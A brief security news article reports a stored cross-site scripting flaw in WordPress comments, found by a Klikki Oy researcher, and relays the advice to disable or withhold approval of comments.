Incident Response, TDR, Vulnerability Management

Stored XSS bug in WordPress, researchers advise to disable comments


A stored cross-site scripting (XSS) vulnerability impacting current WordPress versions has been identified by Jouko Pynnönen, a researcher with Finnish IT company Klikki Oy.

Essentially, JavaScript injected into the comments section of WordPress websites are triggered when viewed, according to a Sunday post. The vulnerability can be leveraged for various purposes, such as gaining administrator privileges.

“If the comment text is long enough, it will be truncated when inserted in the database,” the post stated, adding “the truncation results in malformed HTML generated on the page" and that "the attacker can supply any attributes in the allowed HTML tags.”

WordPress website operators should not approve any comments, or should disable comments, to prevent being affected by the issue, according to the Klikki Oy post.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.